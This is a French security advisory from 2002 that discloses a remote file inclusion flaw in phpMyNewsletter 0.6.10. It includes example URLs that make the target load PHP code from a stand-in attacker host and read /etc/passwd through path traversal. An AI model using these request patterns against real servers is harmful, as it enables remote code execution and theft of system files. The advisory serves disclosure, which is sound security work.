phpMyNewsletter
***************
Informations :
°°°°°°°°°°°°°°
Langage : PHP
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problème : Inclusion de fichiers

Developpement :
°°°°°°°°°°°°°°°
phpMyNewsletter est un script de newsletters où les users peuvent s'inscrire.
Il y a aussi un choix de langues et une partie administrative.
Dans le dossier /include/ se trouve le fichier customize.php dont les 5 premières lignes
sont les suivantes :
--------------------
<?
$langfile = $l;

include $l;
?>
--------------------
On peut donc faire executer n'importe quel code PHP avec les droits et restrictions du serveur,
puisqu'on peut inclure un fichier externe.
Par exemple :
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
avec http://[attacker]/code.txt qui contient la ligne
<? echo $text; ?>

On peut aussi visualiser directement un fichier local, par exemple :
http://[target]/include/customize.php?l=../../../../etc/passwd

Note :
J'avais déjà écris sur une faille phpMyNewsletter, la version 0.6.6.
Il date du 11/02/02 et se nomme "Failles cookies dans 4 services PHP." (4cookieholes.txt).

Patch :
°°°°°°°
La version 0.7beta1a ne semble pas affectée.

Credits :
°°°°°°°°°
Auteur : frog-m@n
E-mail : leseulfrog@hotmail.com
Website : http://www.frog-man.org
Date : 25/09/02
Copyright frog-m@n http://www.phpsecure.info/v2/zone/pArticle